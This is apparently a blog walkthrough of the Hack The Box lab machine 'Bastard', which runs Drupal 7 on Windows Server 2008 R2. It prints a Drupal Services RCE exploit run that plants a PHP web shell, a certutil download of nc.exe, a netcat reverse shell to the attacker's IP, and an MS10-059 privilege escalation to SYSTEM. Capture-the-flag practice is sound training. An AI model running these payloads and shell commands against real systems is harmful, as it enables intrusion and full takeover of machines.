Enumeration
this is a test to see if it updated on wordpress
Nmap scan
# Nmap 7.94 scan initiated Wed Nov 8 04:55:31 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/bastard/results/10.10.10.9/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/bastard/results/10.10.10.9/scans/xml/_quick_tcp_nmap.xml 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up, received user-set (0.31s latency).
Scanned at 2023-11-08 04:55:38 EST for 99s
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 7.5
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-title: Welcome to Bastard | Bastard
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 8 04:57:17 2023 -- 1 IP address (1 host up) scanned in 105.57 seconds
from searchsploit we have many exploits and one got us into a rabit hole.Il write on the one that worked
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
The one that worked is 41564
We can also get it from
https://raw.githubusercontent.com/allyshka/exploits/master/drupal/41564.php
We modify the following sections
$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
'filename' => 'shell4.php',
'data' => '<?php echo system($_GET["cmd"]);; ?>'
];
we run the exploit and we can see the file is writtem
╰─$ php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
# Exploit Editor: aLLy (@iamsecurity)
#!/usr/bin/php
You can use:
41564.php <url> <api-path> <endpoint-name>
Example:
41564.php http://drupal.pes /rest endpoint
Stage 'SQLi' sending:
a:2:{s:8:"username";O:19:"SelectQueryExtender":4:{s:8:"%00*%00query";O:17:"DatabaseCondition":5:{s:13:"%00*%00conditions";a:1:{s:12:"#conjunction";s:3:"AND";}s:12:"%00*%00arguments";a:0:{}s:10:"%00*%00changed";b:0;s:29:"%00*%00queryPlaceholderIdentifier";N;s:13:"stringVersion";s:491:"0x3a) UNION SELECT ux.uid AS uid, ux.name AS name, '$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd' AS pass, ux.mail AS mail, ux.theme AS theme, (SELECT data FROM {cache} WHERE cid='services:rest_endpoint:resources') AS signature, ux.pass AS signature_format, ux.created AS created, ux.access AS access, ux.login AS login, ux.status AS status, ux.timezone AS timezone, ux.language AS language, ux.picture AS picture, ux.init AS init, ux.data AS data FROM {users} ux WHERE ux.uid<>(0";}s:19:"%00*%00uniqueIdentifier";s:8:"anything";s:13:"%00*%00connection";N;s:14:"%00*%00placeholder";i:0;}s:8:"password";s:10:"ouvreboite";}
Stored sqli post information in sqli.post
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
Stored cache_poison post information in cache_poison.post
Stage 'write file' sending:
{"filename":"shell4.php","data":"<?php echo system($_GET[\"cmd\"]);; ?>"}
Stored write post information in write.post
Stored restore_behaviour post information in restore_behaviour.post
File written: http://10.10.10.9/shell4.php
╭─kali@kali ~/HTB/bastard
╰─$
we test with
http://10.10.10.9/shell4.php?cmd=whoami
and we get user so we know it works.
nt authority\iusr nt authority\iusr
Now we can run commands. First thing is to serve and upload nc.exe
serve
╭─kali@kali ~/HTB/bastard
╰─$ ls
41564.php cache_poison.post Churraskito_exe.zip exploit.py ms.exe restore_behaviour.post session.json sqli.post Windows-Exploit-Suggester write.post
44449.rb Churraskito_exe Drupalgeddon2 JuicyPotato.exe nc.exe results shell.exe user.json winPEASx64.exe
╭─kali@kali ~/HTB/bastard
╰─$ serve 900
The tun0 IP is 10.10.14.16 and the eth0 IP is 192.168.1.4.
Starting HTTP server on port 900...
Serving HTTP on 0.0.0.0 port 900 (http://0.0.0.0:900/) ...
on the web browse
http://10.10.10.9/shell4.php?cmd=certutil%20-urlcache%20-split%20-f%20http://10.10.14.16:900/nc.exe%20nc.exe
We then run a reverse shell with nc and capture on our kali on port 443 listening
On the web browser
http://10.10.10.9/shell4.php?cmd=nc.exe 10.10.14.16 443 -e cmd.exe
On the kali
and we are in
╭─kali@kali ~/HTB/silo
╰─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.9] 49171
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>
whoami
C:\inetpub\drupal-7.54>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================= ========
nt authority\iusr S-1-5-17
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Group used for deny only
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
C:\inetpub\drupal-7.54>
I tried Juicy Potatoe on this but it failed.I tried because of SeImpersonatePrivilege
systeminfo
C:\inetpub\drupal-7.54>systeminfo
systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3582622-84461
Original Install Date: 18/3/2017, 7:04:46 ��
System Boot Time: 10/11/2023, 1:52:00 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.600 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.618 MB
Virtual Memory: In Use: 477 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
C:\inetpub\drupal-7.54>
checking with exploit suggester
╭─kali@kali ~/HTB/bastard/Windows-Exploit-Suggester ‹master●›
╰─$ python2 windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt 1 ↵
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
╭─kali@kali ~/HTB/bastard/Windows-Exploit-Suggester ‹master●›
╰─$
After trying one other, i narrowed to MS10-059 and found this exploit on github https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059
Downloaded MS10-059.exe. I had tried with the zipped one but it kept failing. I renamed it to ms.exe and served i
41564.php cache_poison.post Churraskito_exe.zip exploit.py ms.exe restore_behaviour.post session.json sqli.post Windows-Exploit-Suggester write.post
44449.rb Churraskito_exe Drupalgeddon2 JuicyPotato.exe nc.exe results shell.exe user.json winPEASx64.exe
╭─kali@kali ~/HTB/bastard
╰─$ serve 900
The tun0 IP is 10.10.14.16 and the eth0 IP is 192.168.1.4.
Starting HTTP server on port 900...
Serving HTTP on 0.0.0.0 port 900 (http://0.0.0.0:900/) ...
on the windows
C:\temp>certutil -urlcache -split -f http://10.10.14.16:900/ms.exe c:\temp\ms.exe
certutil -urlcache -split -f http://10.10.14.16:900/ms.exe c:\temp\ms.exe
**** Online ****
000000 ...
0bf800
CertUtil: -URLCache command completed successfully.
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is C4CD-C60B
Directory of C:\temp
10/11/2023 02:09 �� <DIR> .
10/11/2023 02:09 �� <DIR> ..
10/11/2023 02:09 �� 784.384 ms.exe
1 File(s) 784.384 bytes
2 Dir(s) 4.101.308.416 bytes free
C:\temp>
from the windows machine
C:\temp>ms.exe 10.10.14.16 4444
ms.exe 10.10.14.16 4444
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
C:\temp>
we get admin on our listener
╭─kali@kali ~/HTB/bastard
╰─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.9] 49176
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\temp>whoami
whoami
nt authority\system
C:\temp>